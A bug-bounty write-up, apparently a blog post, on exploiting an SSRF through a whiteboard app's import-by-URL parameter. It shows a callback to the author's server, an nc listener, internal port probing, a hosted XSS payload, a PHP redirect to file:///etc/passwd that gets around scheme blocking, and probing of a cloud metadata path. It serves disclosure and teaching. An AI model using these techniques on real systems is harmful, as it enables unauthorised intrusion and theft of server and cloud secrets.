“Exploiting a Single Parameter”

Hello There Friends and All Community Members. It's been Ages Since i Did a Write Up As I like to Work Silently. From Past few Days i have seen many write ups while scrolling my Facebook News Feed , So I also thought to do a Write Up and Contribute to this Great Community. Enough of The Boring Words , Now Let's Come to the Point :P

I Hunted in a HackerOne Private Program And found Many Low-Medium Bugs and Left the site As most of the Hunters Do :D , After Few Days i was going through the website there was a Web app of Whiteboard Sketching that was running on Flash. *Ughh ! Why I Didn’t See this Before :/* . 
As you Guys Know Most of this Online White Board Softwares Have Features like Add Image , Upload Video and Etc. Having a Hacker’s Mindset We go After finding the IMPORT BY URL Feature , So i also Got an Idea to Look for it

After I Found the Import by Url Parameter I Immediately Fired Up My Server And Passed this Request :

GET /fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111 HTTP/1.1
Host: Site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: [REDACTED]
Cookie: [COOKIES HERE] Connection: keep-alive

Response In my Terminal :

hishammir@hishammir:~$ nc -v -l 11111 
Listening on [0.0.0.0] (family 0, port 11111) 
Connection from [54.xxx.xxx.xxx] port 11111 [tcp/*] accepted (family 2, sport 41400)
SUCCESS !

So a SSRF was there , I also tried scanning external host’s Ports to Differentiate between open and closed ports. I used Scanme.nmap.org 
In which Port 22 is Opened :

Response on Hitting a Closed Port :

Response on Hitting a Open Port :

So To Exploit the SSRF further I started checking on Which Protocols it was Performing Connections and Sadly it was only HTTP & HTTPS :(

As the Image Fetch Endpoint was on GET Request i had a quick thought of Opening the Endpoint URL in the browser :

/fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111

So the URL Parameter Here was fetching the Data from The URL i gave and executing it Locally , As an Example i wrote google.com in URL parameter and Google Homepage was loaded locally. So Moving Forward I tried finding XSS using the URL parameter and all i was getting a Invalid URL error :/

No XSS :/

As i thought that the URL parameter is Fetching the source code of the website we provide , So Why not Let him fetch him some JS :P

So what i did was i created a html file with this simple xss payload and hosted it on my Server.

<script>alert(document.domain)</script>

The Result was :

XSSED !

Same like this I created a simple php file with the below code and hosted on my Server and gave it to the URL parameter to fetch it and execute.

<?php
header(‘Set-Cookie: Game over’);
?>

Response :

Many of You guys must be thinking why this noob is not trying for the RCE :D

After all this I did try hard for RCE or Reading Server Files , So what I did to achieve RCE ?

Next, i fiddled with different schemes but http, https were only possible, $_POST was blocked too, hence gopher:// file:// dict:// seems to be blocked, But by utilising the same Fact of Resource Sharing i created a script like :

<?php
header(‘Location: file:///etc/passwd’);
?>

That would bypass the Initial file:// scheme blocking restriction and server would itself go to search for file:///etc/passwd which Gives Internal Server Error, hence that was strong motivation that Bruteforcing the header with traversal of path just like 
header(‘Location site.com/../../etc/passwd);
or many more enumeration could have resulted into successful reading ..it requires time to enumerate. But no Luck :/

Next, what i thought had the Strongest relevance was Out of Band Data Exfiltration, I used my own server As “HTTP” was working fine, i retrieved data , which i received in Chunks from an “Internal Server” whose IP was 54.82.xxx.xxx .. That is Strong signal of OOB .

So They were using ec2 instance on 54.82.xxx.xxx from which i received chunks But the common ports were closed of the server and it was opening 80 once requested file_get_contents(); So utilising this, I tried Reading EC2 Instances of their Internal server using the URL parameter but there was some type of Whitelisting or what !

For example: https://75.101.xxx.xx/latest/user-data/ if i opened simply in browser isn’t publicly accessible but if u put in url= parameter than the response was different , Similarly , I tried retrieving IP’s of the website via NslookUP and tried Accessing the IP’s putting them in the URL parameter hoping to Hit a Intranet Maybe ?

For all the Bounty Conscious Guys , A Bounty of $2.5k Was rewarded for the Issue.

For Past Blog Posts Do Visit our Blog https://securitywall.co/blog

Thank Uh Guys For Reading this!

Drop your comments below if you have a question ;)